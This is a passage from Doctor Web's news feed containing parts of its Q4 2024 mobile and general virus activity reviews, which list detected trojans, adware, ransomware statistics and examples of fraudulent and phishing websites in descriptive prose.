    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney.11&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney.11&lt;/b&gt;&lt;/a&gt; unwanted applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, Doctor Web’s malware analysts discovered over 60 malicious apps on Google Play, most of which were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family. Some of them were distributed as financial programs, teaching aids, reference books, and other software, including diaries, notepads, and so on. Their primary task was to load fraudulent websites.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The “QuntFinanzas” and “Trading News” apps, which, among other numerous Android.FakeApp trojans, loaded fraudulent sites&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Malicious actors disguised other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans as games. These could load online casino and bookmaker websites.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;“Bowl Water” and “Playful Petal Pursuit” are examples of games with trojan functionality&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Our experts also &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;uncovered&lt;/a&gt; new variants of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; trojan that was hiding behind the mask of various programs and could also load online casino websites. &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; is interesting in that it gets the target website URL from the malicious DNS server’s TXT file. At the same time, it only manifests itself when connected to the Internet through certain providers.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Examples of new Android.FakeApp.1669 trojan modifications. The “WordCount” app was disguised as a text tool, and the “Split it: Checks and Tips” app was supposed to help café- and restaurant-goers pay their bills and calculate tips.&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Several new members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojan family were among the threats detected on Google Play. They conceal their presence on infected devices.&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.1.png" alt="Android.HiddenAds"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This “Cool Fix Photo Enhancer” photo-editing software was hiding the Android.HiddenAds.4013 ad-displaying trojan&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Moreover, trojans protected with a sophisticated software packer were also discovered: &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57157&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt;, for example.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The “Lie Detector Fun Prank” and “Speaker Dust and Water Cleaner” programs are trojans protected with a software packer&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Our specialists also detected &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, malware designed to subscribe users to paid services.&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.1.png" alt="Android.Subscription"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Instead of editing photos, the “InstaPhoto Editor” program subscribed users to a paid service &lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, cybercriminals again distributed trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; family, which also subscribed victims to paid services.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The SMS messenger “Smart Messages” and the third-party keyboard “Cool Keyboard” tried to covertly subscribe victims to a paid service&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;
  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;


</description></item><item><guid>https://news.drweb.com/show/?i=14959&amp;lng=en</guid><title>Doctor Web’s Q4 2024 virus activity review</title><link>https://news.drweb.com/show/?i=14959&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 04:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to the statistics collected by the Dr.Web anti-virus, the total number of threats detected in the fourth quarter of 2024 decreased by 1.53%, compared to the third quarter. At the same time, the number of unique threats increased by 94.43%. Among the most commonly detected threats were adware programs and adware trojans, malicious scripts, and trojans that are distributed with other malware and used to make the main payload difficult to detect. The majority of detections in email traffic were due to malicious scripts, adware trojans, and cryptocurrency-mining trojans. Increased activity on the part of spyware malicious apps was also noted.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Users whose files were affected by encoder trojans most commonly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Once again, the most widespread threats observed on Android devices were &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans. At the same time, our malware analysts discovered many new threats.&lt;/p&gt;

  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principal trends in Q4 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Adware software and adware trojans were once again the most commonly detected threats.&lt;/li&gt;
      &lt;li&gt;The number of unique threats increased, compared to the previous quarter.&lt;/li&gt;
      &lt;li&gt;Increased activity on the part of spyware trojans in email traffic.&lt;/li&gt;
      &lt;li&gt;The distribution of many trojan apps through Google Play.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;According to Doctor Web’s statistics service&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.1.png" alt="According to Doctor Web’s statistics service"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common threats in Q4 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4210&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8242&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A malicious program that launches a mining trojan.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;h2 class="alignCenter"&gt;Statistics for malware discovered in email traffic&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.1.png" alt="Statistics for malware discovered in email traffic"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;  
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a shortcut that is crafted in a specific way. This shortcut is distributed through removable media, like USB flash drives. To mislead users and conceal its activities, it has a default icon of a disk. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Win32.HLLW.Rendoc.3&amp;lng=en"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;A network worm that spreads via removeable storage media and other channels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Fbng.123&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A spyware trojan also known as Formbook. Designed to steal various data from infected devices, it hijacks passwords saved in web browsers, email clients, online messengers, and other software; intercepts input data in web forms; monitors keystrokes (it executes a keylogger functionality); and takes screenshots. In addition, it can download and run other programs and execute various commands, operating as a backdoor.&lt;/dd&gt;  
  &lt;/dl&gt;

&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, the number of requests made to decrypt files affected by encoder trojans decreased by 18.96%, compared to Q3 2024.&lt;/p&gt;
  &lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s technical service:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.1.png" alt="Encryption ransomware"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common encoders of Q4 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 22.63% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder. 35067&lt;/b&gt; — 3.91% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 3.35% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;In Q4 2024, threat actors continued exploiting a popular fraudulent scheme in which they used specially crafted websites to offer potential victims opportunities to make money through different investments. To “access” the investing service, users are asked to register an account by providing personal data that subsequently ends up in the fraudsters’ hands. Residents of various countries have encountered such websites.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;On this fraudulent site, supposedly affiliated with the World Bank, European users are assured that they will get dividends for investing in promising economic sectors&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent website offers Slovak users the chance to “earn more than $192,460 per month” with the help of some investing service&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Fraudsters pose as large banks and oil and gas companies and offer users from Armenia and Moldova opportunities to “make money on stocks”&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The fake website of an Azerbaijani oil and gas company on which visitors are promised income starting from 1,000 manat per month&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The website of a “new Google investing platform” offers the opportunity to take a survey and get access to a service that will supposedly allow users to make at least €1,000&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;One of the fraudulent sites promises Russian users “a safe passive income”, starting from 150,000 rubles per month&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Doctor Web’s experts noted a seasonal change in the contents of such sites. Ahead of the New Year holidays, scammers began exploiting the gifts theme, allegedly acting on behalf of banks, oil and gas companies, crypto exchanges, and other organizations. On one such fake site, Russian users supposedly could receive payments from a crypto exchange in accordance with some “lists”. And to check whether such payments are available to them, potential victims were asked to take a survey and provide personal data.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fake crypto exchange website offers Russian users the chance to get “New Year payments”&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Another fake site informed visitors about some “New Year’s offer” from an oil and gas company, whereby many Kazakhstani users could allegedly start receiving from 200,000 to 1,000,000 tenge per month in honor of the country’s Independence Day. To “receive” payments, potential victims had to submit an “application” by providing their personal information on this website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This fraudulent site promised Kazakhstani users large payments in honor of Independence Day as part of a “New Year’s offer”&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, our Internet analysts detected the emergence of new fake websites of Russian banks. On these, potential victims are asked to take part in a service-quality survey and then allegedly receive a money reward for doing so. Users are asked to provide personal data, including their full names, the mobile phone number linked to their bank account, as well as their bank card number.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An example of a bogus site that mimics the appearance of a genuine bank website and offers potential victims the opportunity to participate in the survey for a reward&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;To “participate” in the survey, the user has to fill out the form by providing their personal information &lt;/em&gt;&lt;/p&gt;


  &lt;p&gt;Moreover, fraudulent sites offering online training, such as programming, were identified. Interested visitors were asked to leave their contact information to “receive a consultation”.&lt;/p&gt;


  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.1.png" alt="Network fraud"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A website that offers programming courses online. To “receive a consultation”, users have to provide their personal information.&lt;/em&gt;&lt;/p&gt;


  &lt;p&gt;Online scammers keep trying to steal Telegram accounts. In Q4 2024, more phishing sites disguised as various online voting platforms were discovered, for example, for “children’s drawing competitions”. To “confirm” their vote, users are asked to provide their mobile phone number to which a verification code will be sent. However, by typing this code on the bogus website, they are granting fraudsters access to their accounts.&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A scammer website on which visitors are asked to vote in the children’s drawing competition&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
